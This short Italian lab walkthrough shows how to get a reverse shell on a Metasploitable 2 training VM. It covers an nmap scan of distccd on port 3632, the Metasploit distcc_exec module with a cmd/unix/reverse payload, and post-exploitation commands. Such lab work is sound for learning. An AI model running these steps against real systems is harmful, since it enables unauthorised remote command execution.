
In questo video viene mostrato come ottenere una remote shell sfruttando una vulnerabilità nel servizio distccd su Metasploitable 2 tramite Kali Linux.
nmap -sV -p 3632 192.168.56.102
✅ Il risultato sarà:
3632/tcp open distccd v1
👉 Quindi distcc è aperto e sfruttabile.
msfconsole
use exploit/unix/misc/distcc_exec
show options
Parametri necessari:
Option Valore RHOSTS Metasploitable IP RPORT 3632 PAYLOAD cmd/unix/reverse
set RHOSTS 192.168.56.102
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.56.101
LHOST — il tuo indirizzo IP di Kali Linux
run
🎉 Risultato
Se ha successo:
[*] Command shell session opened
Verifichiamo la shell:
whoami
uname -a
id